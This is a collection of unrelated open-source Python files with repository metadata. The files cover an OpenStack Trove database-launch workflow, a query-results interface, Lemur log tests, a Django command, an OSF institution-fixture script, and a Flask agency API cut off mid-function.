datastore = forms.ChoiceField(label=_("Datastore"),
help_text=_(
"Type and version of datastore."))
class Meta(object):
name = _("Details")
help_text_template = "project/databases/_launch_details_help.html"
def clean(self):
if self.data.get("datastore", None) == "select_datastore_type_version":
msg = _("You must select a datastore type and version.")
self._errors["datastore"] = self.error_class([msg])
return self.cleaned_data
@memoized.memoized_method
def flavors(self, request):
try:
return api.trove.flavor_list(request)
except Exception:
LOG.exception("Exception while obtaining flavors list")
redirect = reverse("horizon:project:databases:index")
exceptions.handle(request,
_('Unable to obtain flavors.'),
redirect=redirect)
def populate_flavor_choices(self, request, context):
flavors = self.flavors(request)
if flavors:
return instance_utils.sort_flavor_list(request, flavors)
return []
@memoized.memoized_method
def datastores(self, request):
try:
return api.trove.datastore_list(request)
except Exception:
LOG.exception("Exception while obtaining datastores list")
self._datastores = []
@memoized.memoized_method
def datastore_versions(self, request, datastore):
try:
return api.trove.datastore_version_list(request, datastore)
except Exception:
LOG.exception("Exception while obtaining datastore version list")
self._datastore_versions = []
def populate_datastore_choices(self, request, context):
choices = ()
set_initial = False
datastores = self.datastores(request)
if datastores is not None:
num_datastores_with_one_version = 0
for ds in datastores:
versions = self.datastore_versions(request, ds.name)
if not set_initial:
if len(versions) >= 2:
set_initial = True
elif len(versions) == 1:
num_datastores_with_one_version += 1
if num_datastores_with_one_version > 1:
set_initial = True
if versions:
# only add to choices if datastore has at least one version
version_choices = ()
for v in versions:
version_choices = (version_choices +
((ds.name + ',' + v.name, v.name),))
datastore_choices = (ds.name, version_choices)
choices = choices + (datastore_choices,)
if set_initial:
# prepend choice to force user to choose
initial = (('select_datastore_type_version',
_('Select datastore type and version')))
choices = (initial,) + choices
return choices
TROVE_ADD_USER_PERMS = getattr(settings, 'TROVE_ADD_USER_PERMS', [])
TROVE_ADD_DATABASE_PERMS = getattr(settings, 'TROVE_ADD_DATABASE_PERMS', [])
TROVE_ADD_PERMS = TROVE_ADD_USER_PERMS + TROVE_ADD_DATABASE_PERMS
class SetInstanceDetails(workflows.Step):
action_class = SetInstanceDetailsAction
contributes = ("name", "volume", "flavor", "datastore")
class SetNetworkAction(workflows.Action):
network = forms.MultipleChoiceField(label=_("Networks"),
widget=forms.CheckboxSelectMultiple(),
error_messages={
'required': _(
"At least one network must"
" be specified.")},
help_text=_("Launch instance with"
" these networks"))
def __init__(self, request, *args, **kwargs):
super(SetNetworkAction, self).__init__(request, *args, **kwargs)
network_list = self.fields["network"].choices
if len(network_list) == 1:
self.fields['network'].initial = [network_list[0][0]]
class Meta(object):
name = _("Networking")
permissions = ('openstack.services.network',)
help_text = _("Select networks for your instance.")
def populate_network_choices(self, request, context):
try:
tenant_id = self.request.user.tenant_id
networks = dash_api.neutron.network_list_for_tenant(request,
tenant_id)
network_list = [(network.id, network.name_or_id)
for network in networks]
except Exception:
network_list = []
exceptions.handle(request,
_('Unable to retrieve networks.'))
return network_list
class SetNetwork(workflows.Step):
action_class = SetNetworkAction
template_name = "project/databases/_launch_networks.html"
contributes = ("network_id",)
def contribute(self, data, context):
if data:
networks = self.workflow.request.POST.getlist("network")
# If no networks are explicitly specified, network list
# contains an empty string, so remove it.
networks = [n for n in networks if n != '']
if networks:
context['network_id'] = networks
return context
class AddDatabasesAction(workflows.Action):
"""Initialize the database with users/databases. This tab will honor
the settings which should be a list of permissions required:
* TROVE_ADD_USER_PERMS = []
* TROVE_ADD_DATABASE_PERMS = []
"""
databases = forms.CharField(label=_('Initial Databases'),
required=False,
help_text=_('Comma separated list of '
'databases to create'))
user = forms.CharField(label=_('Initial Admin User'),
required=False,
help_text=_("Initial admin user to add"))
password = forms.CharField(widget=forms.PasswordInput(),
label=_("Password"),
required=False)
host = forms.CharField(label=_("Allowed Host (optional)"),
required=False,
help_text=_("Host or IP that the user is allowed "
"to connect through."))
class Meta(object):
name = _("Initialize Databases")
permissions = TROVE_ADD_PERMS
help_text_template = "project/databases/_launch_initialize_help.html"
def clean(self):
cleaned_data = super(AddDatabasesAction, self).clean()
if cleaned_data.get('user'):
if not cleaned_data.get('password'):
msg = _('You must specify a password if you create a user.')
self._errors["password"] = self.error_class([msg])
if not cleaned_data.get('databases'):
msg = _('You must specify at least one database if '
'you create a user.')
self._errors["databases"] = self.error_class([msg])
return cleaned_data
class InitializeDatabase(workflows.Step):
action_class = AddDatabasesAction
contributes = ["databases", 'user', 'password', 'host']
class AdvancedAction(workflows.Action):
initial_state = forms.ChoiceField(
label=_('Source for Initial State'),
required=False,
help_text=_("Choose initial state."),
choices=[
('', _('None')),
('backup', _('Restore from Backup')),
('master', _('Replicate from Instance'))],
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'initial_state'
}))
backup = forms.ChoiceField(
label=_('Backup Name'),
required=False,
help_text=_('Select a backup to restore'),
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'initial_state',
'data-initial_state-backup': _('Backup Name')
}))
master = forms.ChoiceField(
label=_('Master Instance Name'),
required=False,
help_text=_('Select a master instance'),
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'initial_state',
'data-initial_state-master': _('Master Instance Name')
}))
class Meta(object):
name = _("Advanced")
help_text_template = "project/databases/_launch_advanced_help.html"
def populate_backup_choices(self, request, context):
try:
backups = api.trove.backup_list(request)
choices = [(b.id, b.name) for b in backups
if b.status == 'COMPLETED']
except Exception:
choices = []
if choices:
choices.insert(0, ("", _("Select backup")))
else:
choices.insert(0, ("", _("No backups available")))
return choices
def populate_master_choices(self, request, context):
try:
instances = api.trove.instance_list(request)
choices = [(i.id, i.name) for i in
instances if i.status == 'ACTIVE']
except Exception:
choices = []
if choices:
choices.insert(0, ("", _("Select instance")))
else:
choices.insert(0, ("", _("No instances available")))
return choices
def clean(self):
cleaned_data = super(AdvancedAction, self).clean()
initial_state = cleaned_data.get("initial_state")
if initial_state == 'backup':
backup = self.cleaned_data['backup']
if backup:
try:
bkup = api.trove.backup_get(self.request, backup)
self.cleaned_data['backup'] = bkup.id
except Exception:
raise forms.ValidationError(_("Unable to find backup!"))
else:
raise forms.ValidationError(_("A backup must be selected!"))
cleaned_data['master'] = None
elif initial_state == 'master':
master = self.cleaned_data['master']
if master:
try:
api.trove.instance_get(self.request, master)
except Exception:
raise forms.ValidationError(
_("Unable to find master instance!"))
else:
raise forms.ValidationError(
_("A master instance must be selected!"))
cleaned_data['backup'] = None
else:
cleaned_data['master'] = None
cleaned_data['backup'] = None
return cleaned_data
class Advanced(workflows.Step):
action_class = AdvancedAction
contributes = ['backup', 'master']
class LaunchInstance(workflows.Workflow):
slug = "launch_instance"
name = _("Launch Instance")
finalize_button_name = _("Launch")
success_message = _('Launched %(count)s named "%(name)s".')
failure_message = _('Unable to launch %(count)s named "%(name)s".')
success_url = "horizon:project:databases:index"
default_steps = (SetInstanceDetails,
SetNetwork,
InitializeDatabase,
Advanced)
def __init__(self, request=None, context_seed=None, entry_point=None,
*args, **kwargs):
super(LaunchInstance, self).__init__(request, context_seed,
entry_point, *args, **kwargs)
self.attrs['autocomplete'] = (
settings.HORIZON_CONFIG.get('password_autocomplete'))
def format_status_message(self, message):
name = self.context.get('name', 'unknown instance')
return message % {"count": _("instance"), "name": name}
def _get_databases(self, context):
"""Returns the initial databases for this instance."""
databases = None
if context.get('databases'):
dbs = context['databases']
databases = [{'name': d.strip()} for d in dbs.split(',')]
return databases
def _get_users(self, context):
users = None
if context.get('user'):
user = {
'name': context['user'],
'password': context['password'],
'databases': self._get_databases(context),
}
if context['host']:
user['host'] = context['host']
users = [user]
return users
def _get_backup(self, context):
backup = None
if context.get('backup'):
backup = {'backupRef': context['backup']}
return backup
def _get_nics(self, context):
netids = context.get('network_id', None)
if netids:
return [{"net-id": netid, "v4-fixed-ip": ""}
for netid in netids]
else:
return None
def handle(self, request, context):
try:
datastore = self.context['datastore'].split(',')[0]
datastore_version = self.context['datastore'].split(',')[1]
LOG.info("Launching database instance with parameters "
"{name=%s, volume=%s, flavor=%s, "
"datastore=%s, datastore_version=%s, "
"dbs=%s, users=%s, "
"backups=%s, nics=%s, replica_of=%s}",
context['name'], context['volume'], context['flavor'],
datastore, datastore_version,
self._get_databases(context), self._get_users(context),
self._get_backup(context), self._get_nics(context),
context.get('master'))
api.trove.instance_create(request,
context['name'],
context['volume'],
context['flavor'],
datastore=datastore,
datastore_version=datastore_version,
databases=self._get_databases(context),
users=self._get_users(context),
restore_point=self._get_backup(context),
nics=self._get_nics(context),
replica_of=context.get('master'))
return True
except Exception:
exceptions.handle(request)
return False
|
dklyle/trove-dashboard
|
trove_dashboard/content/databases/workflows/create_instance.py
|
Python
|
apache-2.0
| 16,628
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: query_results
# Purpose: An interface definition for retrieving query results
#
# Notes:
###############################################################################
from abc import ABCMeta, abstractmethod
class QueryResults(object):
___metaclass__ = ABCMeta
def __init__(self):
pass
def __iter__(self):
return self
@abstractmethod
def next(self):
pass
@abstractmethod
def fetchone(self):
pass
@abstractmethod
def fetchall(self):
pass
@abstractmethod
def fetchmany(self, arraysize=None):
pass
|
iagcl/data_pipeline
|
data_pipeline/db/query_results.py
|
Python
|
apache-2.0
| 1,482
|
import pytest
from lemur.tests.vectors import VALID_ADMIN_HEADER_TOKEN, VALID_USER_HEADER_TOKEN
from lemur.logs.views import * # noqa
def test_private_key_audit(client, certificate):
from lemur.certificates.views import CertificatePrivateKey, api
assert len(certificate.logs) == 0
client.get(api.url_for(CertificatePrivateKey, certificate_id=certificate.id), headers=VALID_ADMIN_HEADER_TOKEN)
assert len(certificate.logs) == 1
@pytest.mark.parametrize("token,status", [
(VALID_USER_HEADER_TOKEN, 200),
(VALID_ADMIN_HEADER_TOKEN, 200),
('', 401)
])
def test_get_logs(client, token, status):
assert client.get(api.url_for(LogsList), headers=token).status_code == status
|
nevins-b/lemur
|
lemur/tests/test_logs.py
|
Python
|
apache-2.0
| 706
|
from django.core.management.base import BaseCommand, CommandError
from django.core.management import call_command
from django.conf import settings
from django.db import connection
from django.db.models import Q
from django.template.loader import render_to_string
from structure.models import Structure
from common import definitions
from common.selection import SelectionItem
from common.alignment_gpcr import Alignment
import xlsxwriter, xlrd
from construct.models import *
from construct.functions import *
from construct.tool import *
from residue.models import *
from protein.models import *
import logging, json, os
from collections import OrderedDict
class Command(BaseCommand):
help = "Output all uniprot mappings"
logger = logging.getLogger(__name__)
def handle(self, *args, **options):
for s in Structure.objects.filter(refined=False).all().order_by('protein_conformation__protein__parent__entry_name'):
slug = str(s)
pc = ProteinConformation.objects.filter(protein__entry_name=slug.lower()).get()
rs = pc.residue_set.filter(generic_number__label='34x50')
if not len(rs):
print(slug, pc.protein.parent.entry_name, s.state, s.representative)
|
cmunk/protwis
|
tools/management/commands/pdbs_with_icl3_helix.py
|
Python
|
apache-2.0
| 1,253
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Populate development database with Institution fixtures."""
import logging
import sys
import urllib
from modularodm import Q
from framework.transactions.context import TokuTransaction
from website import settings
from website.app import init_app
from website.models import Institution, Node
from website.search.search import update_institution, update_node
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
ENVS = ['prod', 'stage', 'stage2', 'test']
SHIBBOLETH_SP_LOGIN = '{}/Shibboleth.sso/Login?entityID={{}}'.format(settings.CAS_SERVER_URL)
SHIBBOLETH_SP_LOGOUT = '{}/Shibboleth.sso/Logout?return={{}}'.format(settings.CAS_SERVER_URL)
def encode_uri_component(val):
return urllib.quote(val, safe='~()*!.\'')
def update_or_create(inst_data):
inst = Institution.load(inst_data['_id'])
if inst:
for key, val in inst_data.iteritems():
setattr(inst.node, inst.attribute_map[key], val)
changed_fields = inst.node.save()
if changed_fields:
print('Updated {}: {}'.format(inst.name, changed_fields))
update_institution(inst)
return inst, False
else:
inst = Institution(None)
inst_data = {inst.attribute_map[k]: v for k, v in inst_data.iteritems()}
new_inst = Node(**inst_data)
new_inst.save()
inst = Institution.load(new_inst.institution_id)
print('Added new institution: {}'.format(new_inst.institution_id))
update_institution(inst)
return new_inst, True
def main(env):
INSTITUTIONS = []
if env == 'prod':
INSTITUTIONS = [
{
'_id': 'busara',
'name': 'Busara Center for Behavioral Economics',
'description': 'The <a href="http://www.busaracenter.org/">Busara Center</a> for Behavioral Economics',
'banner_name': 'busara-banner.png',
'logo_name': 'busara-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['busaracenter.org'],
},
{
'_id': 'cos',
'name': 'Center For Open Science',
'description': 'COS is a non-profit technology company providing free and open services to increase inclusivity and transparency of research. Find out more at <a href="https://cos.io">cos.io</a>.',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['osf.cos.io'],
'email_domains': ['cos.io'],
},
{
'_id': 'esip',
'name': 'Federation of Earth Science Information Partners (ESIP)',
'description': '<a href="http://www.esipfed.org/">ESIP\'s</a> mission is to support the networking and data dissemination needs of our members and the global Earth science data community by linking the functional sectors of observation, research, application, education and use of Earth science.',
'banner_name': 'esip-banner.png',
'logo_name': 'esip-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['esipfed.org'],
},
{
'_id': 'ljaf',
'name': 'Laura and John Arnold Foundation',
'description': 'Projects listed below are for grants awarded by the Foundation. Please see the <a href="http://www.arnoldfoundation.org/wp-content/uploads/Guidelines-for-Investments-in-Research.pdf">LJAF Guidelines for Investments in Research</a> for more information and requirements.',
'banner_name': 'ljaf-banner.png',
'logo_name': 'ljaf-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['arnoldfoundation.org'],
},
{
'_id': 'nd',
'name': 'University of Notre Dame',
'description': 'In <a href="https://research.nd.edu/news/64035-notre-dame-center-for-open-science-partner-to-advance-open-science-initiatives/">partnership</a> with the <a href="https://crc.nd.edu">Center for Research Computing</a>, <a href="http://esc.nd.edu">Engineering & Science Computing</a>, and the <a href="https://library.nd.edu">Hesburgh Libraries</a>',
'banner_name': 'nd-banner.png',
'logo_name': 'nd-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://login.nd.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.nd.edu'],
'email_domains': [],
},
{
'_id': 'nyu',
'name': 'New York University',
'description': '...',
'banner_name': 'nyu-banner.png',
'logo_name': 'nyu-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:nyu.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://shibboleth.nyu.edu/idp/profile/Logout')),
'domains': ['osf.nyu.edu'],
'email_domains': [],
},
{
'_id': 'ucr',
'name': 'University of California Riverside',
'description': 'Policy prohibits storing PII or HIPAA data on this site, please see C&C\'s <a href="http://cnc.ucr.edu/security/researchers.html">security site</a> for more information.',
'banner_name': 'ucr-banner.png',
'logo_name': 'ucr-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:ucr.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.ucr.edu'],
'email_domains': [],
},
{
'_id': 'ugent',
'name': 'Universiteit Gent',
'description': None,
'banner_name': 'ugent-banner.png',
'logo_name': 'ugent-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://identity.ugent.be/simplesaml/saml2/idp/metadata.php')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.ugent.be'],
'email_domains': [],
},
{
'_id': 'usc',
'name': 'University of Southern California',
'description': 'Projects must abide by <a href="http://policy.usc.edu/info-security/">USC\'s Information Security Policy</a>. Data stored for human subject research repositories must abide by <a href="http://policy.usc.edu/biorepositories/">USC\'s Biorepository Policy</a>. The OSF may not be used for storage of Personal Health Information that is subject to <a href="http://policy.usc.edu/hipaa/">HIPPA regulations</a>.',
'banner_name': 'usc-banner.png',
'logo_name': 'usc-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:usc.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.usc.edu'],
'email_domains': [],
},
{
'_id': 'uva',
'name': 'University of Virginia',
'description': 'Projects must abide by the University <a href="http://www.virginia.edu/informationpolicy/security.html">Security and Data Protection Policies</a>',
'banner_name': 'uva-banner.png',
'logo_name': 'uva-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:virginia.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.virginia.edu'],
'email_domains': [],
},
{
'_id': 'vt',
'name': 'Virginia Tech',
'description': None,
'banner_name': 'vt-banner.png',
'logo_name': 'vt-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:vt.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.vt.edu'],
'email_domains': [],
},
]
if env == 'stage':
INSTITUTIONS = [
{
'_id': 'cos',
'name': 'Center For Open Science [Stage]',
'description': 'Center for Open Science [Stage]',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['staging-osf.cos.io'],
'email_domains': ['cos.io'],
},
{
'_id': 'nd',
'name': 'University of Notre Dame [Stage]',
'description': 'University of Notre Dame [Stage]',
'banner_name': 'nd-banner.png',
'logo_name': 'nd-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://login-test.cc.nd.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://staging.osf.io/goodbye')),
'domains': ['staging-osf-nd.cos.io'],
'email_domains': [],
},
{
'_id': 'google',
'name': 'Google [Stage]',
'description': 'Google [Stage]',
'banner_name': 'google-banner.png',
'logo_name': 'google-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['gmail.com'],
},
{
'_id': 'yahoo',
'name': 'Yahoo [Stage]',
'description': 'Yahoo [Stage]',
'banner_name': 'yahoo-banner.png',
'logo_name': 'yahoo-shield-rounded-corners.png',
'auth_url': None,
'domains': [],
'email_domains': ['yahoo.com'],
},
]
if env == 'stage2':
INSTITUTIONS = [
{
'_id': 'cos',
'name': 'Center For Open Science [Stage2]',
'description': 'Center for Open Science [Stage2]',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['staging2-osf.cos.io'],
'email_domains': ['cos.io'],
},
]
elif env == 'test':
INSTITUTIONS = [
{
'_id': 'busara',
'name': 'Busara Center for Behavioral Economics [Test]',
'description': 'The <a href="http://www.busaracenter.org/">Busara Center</a> for Behavioral Economics',
'banner_name': 'busara-banner.png',
'logo_name': 'busara-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['busaracenter.org'],
},
{
'_id': 'cos',
'name': 'Center For Open Science [Test]',
'description': 'COS is a non-profit technology company providing free and open services to increase inclusivity and transparency of research. Find out more at <a href="https://cos.io">cos.io</a>.',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['test-osf.cos.io'],
'email_domains': ['cos.io'],
},
{
'_id': 'esip',
'name': 'Federation of Earth Science Information Partners (ESIP) [Test]',
'description': '<a href="http://www.esipfed.org/">ESIP\'s</a> mission is to support the networking and data dissemination needs of our members and the global Earth science data community by linking the functional sectors of observation, research, application, education and use of Earth science.',
'banner_name': 'esip-banner.png',
'logo_name': 'esip-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['esipfed.org'],
},
{
'_id': 'ljaf',
'name': 'Laura and John Arnold Foundation [Test]',
'description': 'Projects listed below are for grants awarded by the Foundation. Please see the <a href="http://www.arnoldfoundation.org/wp-content/uploads/Guidelines-for-Investments-in-Research.pdf">LJAF Guidelines for Investments in Research</a> for more information and requirements.',
'banner_name': 'ljaf-banner.png',
'logo_name': 'ljaf-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['arnoldfoundation.org'],
},
{
'_id': 'nd',
'name': 'University of Notre Dame [Test]',
'description': 'In <a href="https://research.nd.edu/news/64035-notre-dame-center-for-open-science-partner-to-advance-open-science-initiatives/">partnership</a> with the <a href="https://crc.nd.edu">Center for Research Computing</a>, <a href="http://esc.nd.edu">Engineering & Science Computing</a>, and the <a href="https://library.nd.edu">Hesburgh Libraries</a>',
'banner_name': 'nd-banner.png',
'logo_name': 'nd-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://login-test.cc.nd.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-nd.cos.io'],
'email_domains': [],
},
{
'_id': 'nyu',
'name': 'New York University [Test]',
'description': 'New York University [Test]',
'banner_name': 'nyu-banner.png',
'logo_name': 'nyu-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://shibbolethqa.es.its.nyu.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://shibbolethqa.es.its.nyu.edu/idp/profile/Logout')),
'domains': ['test-osf-nyu.cos.io'],
'email_domains': [],
},
{
'_id': 'ucr',
'name': 'University of California Riverside [Test]',
'description': 'Policy prohibits storing PII or HIPAA data on this site, please see C&C\'s <a href="http://cnc.ucr.edu/security/researchers.html">security site</a> for more information.',
'banner_name': 'ucr-banner.png',
'logo_name': 'ucr-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:ucr.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-ucr.cos.io'],
'email_domains': [],
},
{
'_id': 'ugent',
'name': 'Universiteit Gent [Test]',
'description': 'Universiteit Gent [Test]',
'banner_name': 'ugent-banner.png',
'logo_name': 'ugent-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://identity.ugent.be/simplesaml/saml2/idp/metadata.php')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-ugent.cos.io'],
'email_domains': [],
},
{
'_id': 'usc',
'name': 'University of Southern California [Test]',
'description': 'Projects must abide by <a href="http://policy.usc.edu/info-security/">USC\'s Information Security Policy</a>. Data stored for human subject research repositories must abide by <a href="http://policy.usc.edu/biorepositories/">USC\'s Biorepository Policy</a>. The OSF may not be used for storage of Personal Health Information that is subject to <a href="http://policy.usc.edu/hipaa/">HIPPA regulations</a>.',
'banner_name': 'usc-banner.png',
'logo_name': 'usc-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:usc.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-usc.cos.io'],
'email_domains': [],
},
{
'_id': 'uva',
'name': 'University of Virginia [Test]',
'description': 'Projects must abide by the University <a href="http://www.virginia.edu/informationpolicy/security.html">Security and Data Protection Policies</a>',
'banner_name': 'uva-banner.png',
'logo_name': 'uva-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://shibidp-test.its.virginia.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-virginia.cos.io'],
'email_domains': [],
},
{
'_id': 'vt',
'name': 'Virginia Tech [Test]',
'description': None,
'banner_name': 'vt-banner.png',
'logo_name': 'vt-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://shib-pprd.middleware.vt.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['osf.vt.edu'],
'email_domains': [],
},
]
init_app(routes=False)
with TokuTransaction():
for inst_data in INSTITUTIONS:
new_inst, inst_created = update_or_create(inst_data)
# update the nodes elastic docs, to have current names of institutions. This will
# only work properly if this file is the only thing changing institution attributes
if not inst_created:
nodes = Node.find_by_institutions(new_inst, query=Q('is_deleted', 'ne', True))
for node in nodes:
update_node(node, async=False)
for extra_inst in Institution.find(Q('_id', 'nin', [x['_id'] for x in INSTITUTIONS])):
logger.warn('Extra Institution : {} - {}'.format(extra_inst._id, extra_inst.name))
if __name__ == '__main__':
env = str(sys.argv[1]).lower() if len(sys.argv) == 2 else None
env = 'test'
if env not in ENVS:
print('An environment must be specified : {}', ENVS)
sys.exit(1)
main(env)
|
samchrisinger/osf.io
|
scripts/populate_institutions.py
|
Python
|
apache-2.0
| 20,582
|
from flask import (
jsonify,
request,
render_template
)
from flask_login import (
current_user,
login_required
)
from app.agency.api import agency_api_blueprint
from app.agency.api.utils import (
get_active_users_as_choices,
get_letter_templates,
get_reasons
)
from app.models import Agencies, CustomRequestForms
import json
from sqlalchemy import asc
@login_required
@agency_api_blueprint.route('/active_users/<string:agency_ein>', methods=['GET'])
def get_active_users(agency_ein):
"""
Retrieve the active users for the specified agency.
:param agency_ein: Agency EIN (String)
:return: JSON Object({"active_users": [('', 'All'), ('o8pj0k', 'John Doe')],
"is_admin": True}), 200
"""
if current_user.is_agency_admin(agency_ein):
return jsonify({"active_users": get_active_users_as_choices(agency_ein), "is_admin": True}), 200
elif current_user.is_agency_active(agency_ein):
active_users = [
('', 'All'),
(current_user.get_id(), 'My Requests')
]
return jsonify({"active_users": active_users, "is_admin": False}), 200
else:
return jsonify({}), 404
@login_required
@agency_api_blueprint.route('/reasons/<string:agency_ein>', methods=['GET'])
@agency_api_blueprint.route('/reasons/<string:agency_ein>/<string:reason_type>', methods=['GET'])
def get_agency_reasons(agency_ein, reason_type=None):
"""Retrieve an agencies determination reasons for Denials, Closings, and Re-Openings
Args:
agency_ein (str): Agency EIN
reason_type (str): One of ("denial", "closing", "re-opening")
All other determination types do not have reasons.
Returns:
JSON Object (dict): Keys are the reason type, values are an array of tuples (id, title)
"""
return jsonify(get_reasons(agency_ein, reason_type))
@login_required
@agency_api_blueprint.route('/letter_templates/<string:agency_ein>', methods=['GET'])
@agency_api_blueprint.route('/letter_templates/<string:agency_ein>/<string:letter_type>', methods=['GET'])
def get_agency_letter_templates(agency_ein, letter_type=None):
"""
Retrieve letter templates for the specified agency. If letter type is provided, only those templates will be
provided, otherwise all templates will be returned.
:param agency_ein: Agency EIN (String)
:param letter_type: One of "acknowledgment", "denial", "closing", "letter", "extension", "re-opening".
:return: JSON Object (keys are template types, values are arrays of tuples (id, name))
"""
return jsonify(get_letter_templates(agency_ein, letter_type))
@agency_api_blueprint.route('/custom_request_forms/<string:agency_ein>', methods=['GET'])
def get_custom_request_form_options(agency_ein):
"""
Retrieve the custom request forms for the specified agency.
:param agency_ein: Agency EIN (String)
:return: JSON Object (keys are the id of the custom request form, values are the names of the forms)
"""
custom_request_forms = CustomRequestForms.query.with_entities(CustomRequestForms.id,
CustomRequestForms.form_name,
CustomRequestForms.repeatable,
CustomRequestForms.category,
CustomRequestForms.minimum_required).filter_by(
agency_ein=agency_ein).order_by(asc(CustomRequestForms.category), asc(CustomRequestForms.id)).all()
return jsonify(custom_request_forms), 200
@agency_api_blueprint.route('/custom_request_form_fields', methods=['GET'])
def get_custom_request_form_fields():
"""
Get the custom request form field definitions based on form id and agency ein
:return: JSON object containing the form field definitions
"""
custom_request_form = CustomRequestForms.query.filter_by(id=request.args['form_id'],
agency_ein=request.args['agency_ein']).one()
repeatable_counter = json.loads(request.args['repeatable_counter'])
instance_id = custom_request_form.repeatable - repeatable_counter[str(custom_request_form.id)] + 1
form_template = render_template('custom_request_form_templates/form_description_template.html',
form_description=custom_request_form.form_description)
data = {}
character_counters = {}
popovers = {}
tooltips = {}
error_messages = {}
for field in custom_request_form.field_definitions:
for key, value in field.items():
field_text = key
field_name = value['name']
field_type = value['type']
field_values = value.get('values', None)
field_required = value.get('required', False)
min_length = value.get('min_length', None)
max_length = value.get('max_length', None)
character_counter = value.get('character_counter', None)
placeholder = value.get('placeholder', None)
popover = value.get('popover', None)
tooltip = value.get('tooltip', None)
help_text = value.get('help_text', None)
error_message = value.get('error_message', None)
past_date_invalid = value.get('past_date_invalid', None)
current_date_invalid = value.get('current_date_invalid', None)
future_date_invalid = value.get('future_date_invalid', None)
if character_counter:
character_counter_id = field_name + "-" + str(instance_id)
